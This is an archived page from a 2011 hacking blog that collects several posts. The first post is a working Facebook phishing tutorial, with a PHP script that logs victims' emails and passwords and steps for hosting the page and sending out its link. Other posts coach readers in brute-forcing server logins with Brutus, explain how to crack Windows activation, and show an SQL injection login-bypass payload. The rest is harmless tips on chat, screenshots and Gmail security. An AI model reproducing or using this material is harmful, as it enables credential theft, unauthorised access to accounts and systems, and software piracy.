. August 2011 | REAL HACKINGS | viruses | computer | tricks | tips | securities | encryption

Latest Facebook phishing page and script

56 comments
Hi friends, this is our latest article regarding Facebook Phishing attack and we are so glad to announce that we have developed some new phishing script for Facebook which is working 100 %.We have already discussed what is phishing and how to create phishing pages for Gmail, Orkut etc. I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for Facebook.For making Phishing page for any site you need 3 types of files in common.They are
  • .Html file ( ie fake page )
  • .Php file or any other action script page (for tracking the details that entered in page created by you)
  • .Txt file ( To save all the details in text format )
HOW TO MAKE FACEBOOK PHISHING PAGE

1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.

2. Select all ( CTR + A ) and copy all the code and paste it in notepad.

3. Then search(CTR + F) for the keyword action.You can see the code as given below.

action="https://www.facebook.com/login.php?login_attempt=1"

4. Just change the above code as mentioned below

action="pass.php"

after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.

5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘

6.  By this step our PHP script is also ready,

7.  Now host these 2 files ie,
  • facebook.html
  • pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.

8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.

9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.realhackings.com will not be responsible for any such phishing attacks.
continue reading

Funny tricks to rotate Images of any website from your browser

0 comments
These are only funny tricks that can be done easily with some javascripts  from your browser itself.The trick is rotate images of a website in all directions.Use this trick to impress your friends and make fun of them.The trick is so simple and can be done in any websites which is having images in it.All you have to do is to open any website, copy and paste the javascript codes in your browser address bar and press Enter. and watch the magic.
 
Trick to rotate images in circular trajectory.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Trick To Rotate Images in Horizontal Trajectory in Any Website

To rotate images in horizontal trajectory Copy and paste the following javascript code in your browser address bar and press Enter.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval( 'A()',5); void(0);

Trick To Rotate Images in Circular as well as Horizontal Trajectory in Any Website

Using this code you will add both the horizontal as well as Circular rotaion effect to images.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; var DI= document.images; DIL=DI.length; function A(){for(i=0; i < DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5+"px"; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5+"px"}R++}tag=setInterval('A()',5 );document.onmousedown=function(){clearInterval(tag);for(i=0; i < DIL; i++){DI.style.position="static";}}; void(0);

Trick To Rotate Images in Circular Trajectory on Mouse Movement in Any Website

This will add the rotaion effect to images only on mouse movements.Whenever you will move your mouse your images will start rotating.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=100; y4=100; var DI= document.images; DIL=DI.length; function A(_X,_Y){for(i=0; i < DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+_X+"px"; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+_Y+"px"}R++}document.onmousemove=function(event){_X = event.clientX; _Y = event.clientY; A(_X,_Y);};document.onmousedown=function(){for(i=0; i < DIL; i++){DI.style.position="static";}};void(0);

Use these codes on webpages with large number of images to get better effects and enjoy!
continue reading

Brute force attack to hack passwords of servers using Brutus

5 comments
I believe all are familiar with Brute force attacks and we have already discussed some brute force attacks to hack gmail passwords.You can also read this how to hack gmail by brute force.But here, we are doing something different.Actually the technique we are using is Brute force only.But this is all about hacking passwords of servers and the tool we are using is called Brutus.

DOWNLOAD LINK


Extract all the files from the downloaded archive and open Brutus.you can see a window like this


What does Brutus do?

In simple terms, Brutus is an online or remote password cracker. More specifically it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of a supported target system might be an FTP server, a password protected web page, a router console a POP3 server etc. It is used primarily in two contexts :

· To obtain the valid access tokens for a particular user on a particular target.
· To obtain any valid access tokens on a particular target where only target penetration is required.

What is a target?

Well that depends on you. As far as Brutus is concerned a target is a remote system and possibly a remote user on a remote system, there is more. To engage any given target we require an attack method, generally we only perform one type of remote attack - that is we attempt to positivley authenticate with the target by using a number of access token combinations. A target may provide no available attack methods, it may provide one or it may provide several.

What is an attack method?

In the context of Brutus, it is a service provided by the target that allows a remote client to authenticate against the target using client supplied credentials. For instance a UNIX server sat on a network somewhere may be offering Telnet and FTP services to remote users. Both telnet and FTP require the remote user to authenticate themselves before access is granted. For both these services the required credentials are usually a username and a password, therefore we have two available attack methods : FTP or Telnet. Some target systems will provide no opportunity for attack (at least not a remote authentication attack), perhaps they offer no remote services, perhaps they only offer anonymnous remote services (that require no authentication) or perhaps they offer authenticated remote services but use mechanisms to prevent authentication attacks such as account lockout or one time passwords of some sort.

Which attack method is best?

Again, that depends on some factors which may include :
  •  Is the target service available to any remote system? (Yes is good)
  •  Does the target service require a single token (e.g. just a password) or multiple tokens (e.g. Username & password & domain?) (Single tends to be easier)
  •  Does the target service feature account lockouts or large delays before returning the result of the authentication attempt? (Yes is bad)
  •  Does the target service allow us to maintain a persistant connection? (Yes is good)
  •  Is the service supported by Brutus, if not can it be defined? (Yes is essential)
  •  Will a positive authentication against the service actually be useful for the overall objective? (Yes helps)

Basically, the fastest most reliable attack method is always the one to choose if you have a choice. Generally trouble free methods include HTTP (Basic Auth) which is pretty fast, does not include lockouts or authentication delays - however the results may not be much use as often HTTP (Basic Auth) account information is separate from system account databases. The fastest remote service I have found to date is NetBus! Not only is it incredibly quick to authenticate against but a successful password aquisition will yield extreme target penetration.

I still don't get it, what does it do?

Find some service where you need to enter your username and password to gain access, type in a username and password and see what happens, then do it again, and again, and again, and again until you gain access and are positivley authenticated or until you get bored. Pretty straightforward really.

FEATURES

  • Support for up to 60 simultaneous sessions
  • Fully multi-threaded
  • Highly customisable authentication sequences
  • Single user mode, User List mode, User/Pass combo mode, Password only mode
  • Brute force password mode
  • Word list creation/generation/processing
  • Import/Export custom services
  • Load/Save position
  • SOCKS support (with optional authentication)
  • Capable of 2500+ authentications/second over high speed connections

SOME TIPS TO GET THE BEST RESULT

DONT use lots of simultaneous connections unless it's beneficial to do so - Usually slow responding targets (like many POP3 servers which have 10 second + failure notification times) are the best candidates.

There are many variables to take into account, connection speed, authentication notification speed, server capacity, even your machine's capacity in some scenarios. Very often you will find less connections will give you more speed...this is important.

DON'T use the keepalive/stayconnected options if you are having problems - it is usually better to troubleshoot these things in one authentication per connection mode.

DO use keepalive/stay connected options if you can -they can greatly increase speed.

DO use positive authentication responses in your custom sequences - they are usually more reliable.

DO take note of the error indicators in the bottom right of the brutus main window -if they are flashing too often then consider changing some settings.

DO use a network sniffer if you can - to understand and troubleshoot authentication sequences to various services. Also consider using netcat or telnet to 'manually' authenticate against a service to see exactly what the server is responding with and what you need to tell it.

DO create custom word lists for your specific targets – If the target user(s) is/are known then create user specific wordlists using the built in password generator. Using target specific lists in conjunction with perhaps a list of common passwords probably offers you the best chance of positive authentication in a reasonable amount of time.
continue reading

Trick to activate Windows with genuine product key and OEM certificates.

5 comments
Hi friends, this is my new article based on a new computer trick to activate Windows 7 with a genuine key and with genuine certificates.It is nothing but a Windows Loader which is used to crack Windows 7.This Loader is a safe which is tested and working on both x86 and x64.The version works on Virtual environment and Dual-boot which is installed without a key which works on Windows 7 Ultimate, Professional, Enterprise, Starter, Basic and Home editions.

Another concept added on this Loader is Logos and OEM (Original Equipment Manufacturer) and No BIOS modification is needed for this version. It is a user friendly tool which comes with a G U I environment which It has no test during boot.Another features is the recovery option which can be used to restore, if your computer can not boot after the application 

DOWNLOAD LINK


FEATURES


- Activate any editions
- Automatic and Advanced Mode
- Complete loaders collection
- Custom loaders integration
- Windows activation information
- SLIC checking: checksum, SLIC&RSDT&XSDT markers
- Installed loader information: Boot Loader and SLIC Emulator
- Installed key information
- SLIC dump
- Certificate dump
- Product key checker
- Logos and OEM information installation
- Commmand line keys
- Internal SLIC's storage
- Internal Certificates storage
- Ability to use external SLIC's storage
- Ability to use external Certificates storage
- SLIC and Certificate comparison
- Custom KMS servers list
- Custom keys list
- Custom logos list


BEFORE USING THIS ACTIVATOR


AFTER USING THIS ACTIVATOR


INSTALLATION TIPS :

1. Run the '7Loader' on your Windows

2. In the Basic mode click the Activate button to activate the Loader for 180 days or 49516 days and click Activate button to activate the certificate.


3. Click Deactivate button to deactivate it.

4. Click the Advanced Mode to go to advanced option as shown below


5. Select the certificates you need to install in your winows
6. Press "OK" and PC will reboot once complete.

FREQUENTLY ASKED QUESTIONS

Q: I the novice user of the PC, saw that there are various activators Windows 7 Loader. What of them to select?
A: To beginners and those who not ready to restore the loader, owing to impossibility to boot after application of activators, it is recommended to use only safe Windows 7 Loader eXtreme Edition v3. If the "Loader" method used then press "Cancel" button after reboot.

Q: How to use the activator?
A: Start w7lxe.exe, do nothing, wait when all makes the activator in an automatic mode.

Q: Online genuine validation shows the error.
A: KB971033 is blocked for the purpose of preventing possible activation loss in the future.

Q: Can't Microsoft begin to ban modified BIOS with SLIC 2.1?
A: Yes, it is theoretically possible. In Windows Vista times loaders banning was just theory too.

Q: What emulation mode is used by default?
A: Safest emulation is used for SLIC emulator check. If SLIC emulation and activation has passed successfully than UnSafe emulation.

Q: For me it was not initial the load menu and delay time for boot menu but why after application of the "Loader" method there is 30 second return counting?
A: Such occurs only at the first reboot what in case if the SLIC emulator does not work (black screen) it was possible to reboot and use the native choice Windows 7. Other activators, in the case if the SLIC emulator does not work, it demands to restore procedure with installation DVD usage.

Q: I do not wish to use illegal keys and KMS servers, but thus I wish to have to have "genuine software" status. What can recommend?
A: Use the grace period. For limitation overcoming on the maximum period of usage (4x30=120 days) to apply the "Trial Reset" method to reset of counters:
w7lxe.exe->Trial Reset->Activate
or
w7lxe.exe /method=TrialReset

Q: How to restore system after unsuccessful usage of TrialReset method by 3.115-3.118 version?
A: Run
w7lxe.exe /trial-recovery
from different windows 7 or Windows Vista installation.

Q: I wish to make on Windows 7 and Windows Vista 49516 grace days the "49516 Trial Days" method as a constant working solution of a question about activation.
A: It is not necessary to make such choice as a constant basis. With the advent of the "Trial Reset" method the such solution has lost sense. Though for Windows Server 2008R2/2008 it is quite applicable. The "49516 Trial Days" method now has more likely fact-finding character that such is possible.

Q: After application of the "Loader" method activation does not occur. What to do?
A:
1) Advanced Mode->Boot Loader->Install
2) Reboot
3) Advanced Mode->Upload Screenshot
Or keyboard->PrintScreen; Run->MsPaint->Paste->Save; http://imageshack.us/->Browse...->start upload
4) Ask advanced users for help, having placed a screenshot.

Q: Used the "Loader" method, after rebooting the activator choice (Windows 7 Loader XE) does not load Windows. It was necessary to take advantage of the original choice.
A: It most likely means that the SLIC emulator used by default does not work on the given computer.
Try other emulators (it is necessary to reboot each time):
Advanced Mode->Boot Loader: MBR SLIC Loader->Install
Advanced Mode->Boot Loader: Vista Boot 08.0501->Install
Advanced Mode->Boot Loader: Vista Loader 2.1.2->Install
Advanced Mode->Boot Loader: WOW7 Loader->Install
Advanced Mode->Boot Loader: W7 Loader (Default)->Install
Advanced Mode->Boot Loader: W7 Loader (Alternative)->Install
Advanced Mode->Boot Loader: W7 Loader (LowMemory)->Install
Advanced Mode->Boot Loader: SLIC Driver->Install

Q: How to change delay time for boot menu?
A: Advanced Mode->Boot Loader->timeouts

Q: In what advantage Safest emulation?
A: Always there is a possibility after rebooting to load Windows that is important when the SLIC emulator does not work. Safe emulation should gives the such possibility too.

Q: At start the activator shows the message that it supports only FAT and NTFS file systems.
A: It is possible to skip compulsorily the check of the file system and to start the activator:
w7lxe.exe/fscheck=off
Or for preventing from undesirable effects:
w7lxe.exe/fscheck=off/bootsect=off /mbr=off
- In these two variants UnSafe emulation does not work.

Q: In the list of warnings it is written: "Loader: SCSI boot device detected!". What consequences can occur owing to application of the "Loader" method?
A: Warnings specify in the reason there can not pass activation. In this case SLIC emulation will probably not work.
If the emulator has not worked, in such situation it is necessary to try:
Advanced Mode->Boot Loader: Vista Boot 08.0501->Install
Advanced Mode->Boot Loader: SLIC Driver->Install

Q: In the list of warnings it is written: "Incomplite SLIC(OEMX) detected!".
A: It is necessary to try:
Advanced Mode->Boot Loader: MBR SLIC Loader->Install

Q: How the automatic mode of the activator works? How it makes a choice of a method for the recommendation?
A: If for the installed edition Windows exists OEM:SLP key and SLIC is detected - the "Certificate" method is recommended.
If SLIC is absent - the "Loader" method.
If for the installed edition of Windows does not exist OEM:SLP key - the "180+ Days" method.
Thus all line of editions Windows 7/Vista/2008R2/2008 becomes covered (Except N and E editions which can be activated by self-decision). if Windows marked as "Pirated" Or other methods are not applicable - than "Trial Reset" method.

Q: What sequence of operations corresponds to the "Loader" method in the automatic mode?
A:
1) Advanced Mode->Key AND Certificates->Key: OEM:SLP (OEM) Key->Install
2) Advanced Mode->Key AND Certificates->Certificate->Install
3) Advanced Mode->Boot Loader->Install
4) Reboot
If SLIC emulation and activation has passed successfully:
5) Advanced Mode->Boot Loader->Emulation: UnSafe->Install
6) Reboot

Q: What sequence of operations corresponds to the "180+ Days" method in the automatic mode?
A:
1) Advanced Mode->Key AND Certificates->Key: Volume:GVLK (Volume) Key->Install
2) Advanced Mode->KMS Activation->Activate

Q: What sequence of operations corresponds to the "Certificate" method in the automatic mode?
A:
1) Advanced Mode->Key AND Certificates->Key: OEM:SLP (OEM) Key->Install
2) Advanced Mode->Key AND Certificates->Certificate->Install

Q: I has bought a new computer how to extract all information linked to activation?
A:
1) Advanced Mode->Windows->Dump (Certificate) - keeps the certificate
2) Advanced Mode->BIOS->Dump (SLIC) - saves SLIC
3) Product Key Info->Product Key - shows the installed key

Q: How to return the Windows 7 boot screen and the hibernation mode if 3.011-3.014 version has been used?
A:
1) w7lxe.exe->Loader->Deactivate
2) Reboot
3) w7lxe.exe->Loader->Activate

Q: Activated, but activation is lost each time after hibernation.
A: Advanced Mode->Boot Loader->Emulation: Safe->Install
or
Advanced Mode->Boot Loader->Emulation: UnSafe->Install
or
bcdedit -store \boot\lxe ...

Q: For me it is installed Windows XP and Windows 7. After activation there was a third choice "Windows 7 Loader XE". Whether it is possible to delete the native choice Windows 7?
A: Advanced Mode->Boot Loader->Emulation: Safe->Install
Or
Advanced Mode->Boot Loader->Emulation: UnSafe->Install
- the such solution is preferable.

Q: It is necessary to customize loading Windows through bcdedit, in particular bcdedit-set testsigning on and HASP driver does not work.
A: Advanced Mode->Boot Loader->Emulation: Safe->Install
Or
Advanced Mode->Boot Loader->Emulation: UnSafe->Install

Q: At loading computer there is a flashing menu. How to remove the flashing or the menu?
A: Advanced Mode->Boot Loader->Emulation: UnSafe->Install

Q: I wish to activate at once through UnSafe emulation. Whether it is necessary so to do?
A: No, it is recommended to pick up in the beginning the working SLIC emulator, with which Windows is activated.
After that it is possible to install through UnSafe SLIC emulation, with the big share of probability, it will work without complications.

Q: I use... (Something like a virtual file system) for disk image creation in real time. It boots before Windows - I am afraid to use the "Loader" method.
A: In an automatic mode (Safest emulation) usually the boot sector and the boot loader are not rewritten.
What to prevent those exclusive situations in which the activator all the same rewrites boot sector, it is possible to use the command line key:
w7lxe.exe/bootsect=off /mbr=off

Q: What physical changes bring in system for UnSafe, Safe and Safest emulation modes?
A:
Safest - changes mention only the boot menu.
Safe - changes mention only the boot loader.
UnSafe - changes mention boot sector and the loader.

Q: What changes bring in process of loading Windows for UnSafe, Safe and Safest emulation modes?
A:
Safest - the activator loader calls Windows.
Safe - the activator loader calls the original boot loader.
UnSafe - the boot sector calls the activator loader, the activator loader calls the original boot loader.

Q: In what emulation mode (UnSafe, Safe, Safest) other activators Windows 7 Loader work?
A: UnSafe

Q: I have a legal MSDN key for edition distinct from that which is installed, Windows refuses to accept it.
A: Advanced Mode->Key AND Certificates->Key: Retail (MSDN) Key->Install

Q: How the activator allows installing keys of editions distinct from that which has been installed?
A: Such it is possible thanks to existence of the internal mechanism Windows "Anytime Upgrade". Direct interaction of the activator with it allows not breaking functioning of the activation mechanism (in difference of other "universal" activators).


Q: How to get the information about the new key?
A: Advanced Mode->Key AND Certificate->Key->Get Info

Q: Where to learn what keys of the command line and external files support the activator?
A: Advanced Mode->Windows 7 Loader XE->Info

Q: Where to learn the detailed information about Safest, Safe, Unsafe emulation?
A: The scheme in archive: Info\w7lxe-emu1-3500.png

continue reading

Basic Introduction To SQL Injection

2 comments
SQL injection is a vulnerability that allows an attacker to influence the queries that are passed to the back-end database.It has been present since the time databases have been attached to the web applications.Before understanding the how SQL injection attacks we need to understand the Simple Three Tier Architecture or a Four Tier Architecture.This will clear your basics and give you a rough idea of how database-driven web applications work.

Three Tier Architecture

In a simple three tier datbase-driven architecture the three layers that are used are:-
Presentation Tier(Browsers)
Logic Tier
Storage Tier(Database)

The three tier architecture follows a linear relationship i.e Presentation Tier connects to the Logic Tier and theLogic Tier connects to the Storage Tier

Presentation Tier <–> Logic Tier <--> Storage Tier

To understand this consider an example



Suppose you connect to the http://www.website.com using your web browser.This is your presentation tier.Now the web server residing in the logic tier will load the script for the entered url and will pass it to the scripting engine which will parse and execute the script.It will also open a connection to the database i.e Storage Tier .It will perform the queries and the data from the database is transferred to the logic tier which will now convert into HTML which is rendered by the Browser.

Four Tier Architecture

In Four Tier Architecture an layer of Application Server is inserted between a web server and the database.
Presentation Tier(Browsers)
Logic Tier
Application Tier
Storage Tier(Database)


In four tier architecture the connection to the database is opened by application server which has Application Programming Interface (API) that implements the business logic before transferring the data to the Logic tier.

Working Of SQL Injection

SQL injection can be used using various methods.In this tutorial I will explain to the basic concepts behind the SQL injection.Suppose you are on a shopping site and you have selected the option of showing all the accessories that costless then 200$ and its Url is like

http://www.shoppingsite.com/products.php?val=100

To test this website for SQL injection try appending your SQl injection commands in the val parameter ‘OR ‘1’=’1
http://www.shoppingsite.com/products.php?val=100’OR’1’=’1

If the above injection works and shows the list of all the accessories then the website is vulnerable to this type of SQL injection

This means that at the backend the script will be executed as shown:

SELECT * FROM Productstbl WHERE Price<’200.00’ OR ‘1’=’1’

ORDER BY Productdescription


As the condition 1=1 so this will give you list of all the products

How this SQL injection Attack Can Be Harmful

Suppose a website uses the following url for logging into admin panel

http://www.website.com/cms/login.php?username=saini&password=go

now if the above website is vulnerable to the SQL injection as mentioned in the above example then by entering any username and password in the url you can login

http://www.website.com/ms/login.php?username=dnt&password=dnt’OR’1’=’1

so you will just login without valid username and password to the admin panel of a website.Thats about the Introduction to the SQL injection.I hope you all got a clear idea about SQL injection now read this Advanced SQL injection techniques with HAVIJ.
continue reading

How To Do Group Chat in Facebook

0 comments
I know the fact that almost all of your addicted to Facebook  and you may be familiar with chatting in Facebook.But have you ever tried a group chat in Facebook.I believe many of you won't.So in this article I am going to share an idea for doing group chat in Facebook.Earlier when facebook launched their video calling feature they also launched Group Chat. This was one of the most awaited feature as group chat has been already available in facebook chat rivals like Gtalk as well as yahoo messenger.Now you can chat with multiple friends through single chat box.Using group chat is pretty easy and requires just simple steps.

HOW TO DO GROUP CHAT IN FACEBOOK

* Login Into your Facebook Account

* Open Chat box for any online friend

* Now click on Gears icon in chat box and then click on Add Friends to Chat option.

* Type in the name of the friend that you want to add in group chat.

* Click Done and Start chatting with multiple friends

You can Add as many friends as you want. 
Thats it and start chatting in a group now itself and enjoy...........
continue reading

Top 6 tips to protect your Gmail and other Google accounts

0 comments
Gmail is one of the most popular free Email service that has been used widely.But do you think your Gmail is secure?.I don't know how many of you are taking care in protecting your Gmail and other Google accounts.You may be linking your personal account with other services like PayPal or Adsense,But once Your Gmail is lost Everything associated it will be lost.Reusing your password across multiple websites increases the chance it will be stolen.So I am giving you Top 6 tips to keep your account always secure and reduce the chances of your Gmail account being hacked.We have already discussed some possible ways of hacking gmail.You can also read this possible ways of hacking a GMAIL

USE 2 STEP VERIFICATION FOR LOGIN

Use 2-step verification to help protect your Google Account even if your password is stolen. With 2-step verification, signing into your account requires both your password and a verification code you receive on your phone.


Don't worry—you'll only need your phone about once a month or when you sign in from computers you don't use regularly. You can also use printed codes as backup for when you travel.

For setting 2 step verification for your account, just goto Mail settings->accounts and import you can see a window as shown below.



Click other account settings to get a window as shown below and you can set your mobile number there.


The use of 2 Step verification will enable high security that even if your account's password is stolen,no one can login to your account with out the verification code that is being send to your mobile number.

Check if your Gmail messages are being forwarded without your permission
Gmail gives you the ability to forward your emails to another email address. There are situations where this might be handy, of course, but it can also be used by hackers to secretly read the messages you receive.

Go into your Gmail account settings, and select the "Forwarding and POP/IMAP" tab.If your emails are being forwarded to another address, then you will see something like the following:

That's fine if you authorised for your emails to be forwarded to that email address, but a bad thing if you didn't.

If your messages are not being forwarded you will see a screen more like this:


Hackers want to break into your account not just to see what email you've received up until their break-in. Ideally, they would like to have ongoing access to your email, even if you change your password or enable two step verification. That's why it's so important to check that no-one has sneakily asked for all of your email to be forwarded to them.

In a similar vein, you had best ensure that no-one has unexpectedly been authorised to read and send email from your account.

Never save passwords in any of the Browsers

Its better not to save any passwords in any of your browsers.unless your system has no physical access to any third party.We have already discussed some hacking techniques like how to convert browser to a keylogger and how retrieve saved passwords.You can also read this How to convert browser to keylogger and getting saved passwords

Its best not to associate your personal gmail with Facebook or Twitter

You all may be using either Facebook or Twitter or both and may associated your personal Gmail as your primary Email in those accounts.But keep in mind that these are accounts that can be hacked easily and once they are hacked,The hacker is getting a chance to create a backdoor to your Gmail account.But if you are using 2 Step verification then its fine.

Never click any suspected links from your Gmail inbox.

You may be getting mails like click here to open your gift or something like that.Phishing attacks are common and hackers can easily hack your account.We have discussed earlier What is phishing and how hackers steal your passwords.

Always Choose a Unique security question and password

One of the easiest way of ressetting your account password is by answering your security question.If the hacker knows all your personal details he can easily hack your account by anwering your personal security question.Hackers also get your personal details by watching your activities from social sites like Facebook, Twitter or any other.If any hacker gets your personal details he can also go for Brute-force attack.This checking all the combination of possible characters for your password.You can also read How to use Brute-force attack to hack Gmail.So always keep a unique security question and password that does not related to your personal details.

Hope you all enjoyed this article and please pass your comments if you found anything useful !!!!!
continue reading

Remotely Reboot Your Computer Through a Web Browser with Shutter

1 comments
Hi fiiends,Today I am going to share a new trick to remotely control  a system with a web interface.I have already posted articles about remotely controlling any systems.You can read this also How to shutdown any system connected in LAN and How to control a pc using email or message.But today, I am going to give you a new trick to control  systems remotely by installing a free application created by Denis Kozlov called Shutter. The cool thing about Shutter is that once you’ve got it set up on your target PC, you can perform various functions on your computer through any web browser on the Internet. First, install Shutter to your target PC or server and the initial screen that comes up will look like this.


First of all, don’t worry about the settings on this screen because these are for when you use the application locally. However, your interest is in using the application as a sort of “web server” that gives you access to your PC from any browser. To set it up, click on the Options button and choose the “Web Interface” tab.



On this screen, select “Enable,” choose a “Listen IP” from the list and enter whatever port you’d like to use. Most folks just use port 80 since it’s default, however if you want added security you can use some obscure port. Finally, choose your Username and Password (required), click save and the application is set up – it’s as easy as that! The only last step is to make sure that if you’re using a router, you open up a “hole” so that you can connect to your Shutter server through the router.

To do this, just go to your router administration control panel (usually 192.168.0.1 or 192.168.1.1, depending on your router’s brand) and configure port forwarding as shown here.



Just make sure the IP and port you defined in Shutter is defined here and that it’s enabled. Once you save, setup is complete. Now you can go to any web browser and send not only a “restart” command to your computer, but also a whole list of other commands.

To access the Shutter service, you can just type in the IP on your local network. In my case, I’d open a browser and type “192.168.1.103:1087″ to access the web interface. From an external Internet location, like a library or from work, I simply type in my external IP assigned by the ISP followed by the port, such as “65.xxx.xxx.122:1087″ and the web interface will come up after you log in with the ID and password you defined.


NOTE: If you don’t know what your external IP is, just visit whatismyip.com




As you can see, the Shutter web interface lets you perform a whole list of tasks on your remote computer, including muting the volume, turning off the monitor or running a specific program. The great thing about this approach is that all of these commands are issued from the application running on your target computer, so you don’t need to perform any special security configurations to remotely trigger these commands.

continue reading

Trick to change windows 7 start button style

7 comments
I believe you all know well about windows start button and its uses.If not keep in mind,Windows 95, 98, NT and later use the Start button. The Windows Start button is on the bottom left corner of your desktop on the TaskBar. The Start button is what you click on to begin almost any task on your computer. A single left-click on the Start button opens the Start menu. In the Programs section of the Start menu, you have access to many of the applications on your computer. In the Settings section of the Start Menu you can access your computer's settings, printer, TaskBar and Start Menu options. From the Start menu you can also Shut Down your computer and install programs.These are only basics and just leave this.Now we can directly move to our trick of changing windows 7 start button.

If you are the one who takes care in giving best look to your windows OS, just like me,then you must know this trick of changing the style of default Start button in windows 7 as shown below.


The trick is so simple and can be achieved easily without altering your major system files.Just follow the steps given below.

1) Download this small utility and run this on your windows 7 OS


2) After downloading just run this tool in your system,you can see a window as shown below.


3) Just click select and change button and select any style from the downloaded archive.Below is the preview of some of the buttons in the downloaded archive.


There are more than 50 buttons in the downloaded archive.Just select any one and give your windows a nice look.
continue reading

How to Take screenshots from your mobile phones

2 comments
You might have seen in several websites or blogs,that are using mobile phone screenshots to show demonstrations of any features or softwares.You wondered how they take those snaps that, there is no alternative to a mobile phone.And you also probably have running some blogs/websites and want to show screenshots of mobile phone for giving detailed demo then you are at the right place now.Taking snaps from your mobile is not at all a difficult task.There are ready made tools for this just use this.I have given some phone models below along with the download link for taking screenshots from such phones.

FOR JAVA MOBILES


The above tool does not support most of the devices which do not run on Symbian OS. So, the solution is here. This is a Mobile Screenshot Tool to help mobile users running with java based mobiles. Most of the Sony Ericsson and other java handsets are supported here.

FOR SYMBIAN MOBILES:


Mobile phones running the Symbian operating system with, you will be able to download the Screenshot tool here. Do you care that you download the right version is available in two different versions of software on your S60 or UIQ mobile phones are to be based on the same platform. You may also use other programs: FExplorer.
S60 Supported Models: Nokia 3250, N71, N73, N75, N76, N80, N81, N82, N91, N92, N93, N95, E50, E51, E60, E61, E61i, E62, E65, E70, E90
UIQ: Sony Ericsson P900, P908, P910, P910i, Motorola A920, A925

FOR WINDOWS MOBILES:


For this, you have a free, fast and easy from the ilium software tool that can take photos on your Windows Mobile screen. You, more features, you can learn how to download and use on their official website.
 
You may also use Capsure for the same purpose. This has got many features like capturing an active application, capturing in timed intervals, adding caption. Supports bmp, jpg, png and gif formats.
Supported Windows Mobile: Windows Mobile 6 Professional – Classic and Standard, Windows Mobile 5.0, Windows Mobile 2003SE: Windows CE 4.21, Windows Mobile 2003 (touchscreen devices only): Windows CE 4.20

FOR BLACKBERRY:

A small tool to capture the current screen of a 7xxx, 8xxx, 9xxx Blackberry. This is useful to e.g. create documentation. Download BBScreenShooter. Read more how to use it.

Enjoy!

FREQUENTLY ASKED QUESTIONS

1. How do I capture screenshots?
 
You can use the shortcut to capture screenshot. In the old version (pre v3.x), the default shortcut is <Edit>+<OK>. In the new version (v3.x), the default shortcut is the Camera key.

Note that not all devices might support the shortcut keys. There are simply too many devices out there that I cannot test the application on every single devices.

2. What is the <Edit> key?

The <Edit> key is sometimes called <Shift> key or <Pencil> key. Some newer S60 devices do not have this key any more. If your device does not have <Edit> key, please use another shortcut, such as <#>+<*>.

3.Why Camera key does not capture screenshot on N82 and N95 European version (and possibly some other models)?
If your camera has lens cover, then you need to open it; otherwise the Camera key won't be detected by Screenshot application. Unfortunately, it is the way S60 works. Alternatively, you can also choose other shortcuts.

4. How can I install the unsigned version?

Symbian OS requires application to be signed before it can be installed to the device. You can sign it using Symbian Signed OR Read How to install unsiged applications, You need the IMEI number of your device and a valid email address.
continue reading

What to do if your system is infected by virus

0 comments
We've all had it happen, that moment of panic when you wonder if your computer has a virus. In that situation, we can make the wrong decisions by deleting or installing files. If your system is set up properly and you back up files on a regular basis, there is no reason to panic. Most of us have received an email "from a friend" warning us of impending doom. Sometimes the warning is real and sometimes it's not. Usually the email begins "I found this on my computer and I think I may have accidentally sent it to you. Better check your computer. I'm really sorry." The email finishes up with urging you to send this message to EVERYONE in your address book. Hoaxes can actually make you the virus by getting you to delete needed programs or files causing the system to bog down or crash. These hoaxes usually arrive in the form of an e-mail and contain false virus warnings. When in doubt, check a list of known virus hoaxes. The best thing to do is to delete the email.

Some virus programs appear to have been sent by a friend or a company you have emailed before. Most come from unknown sources. Once opened they work by pulling names out of a computer's address book and using them to further spread the virus.

You can set your email to accept plain text only. Block or remove emails that contain file attachments. Some viruses are even programmed to instruct your pc to show you only the plain text but can still infect your computer with hidden malicious code.

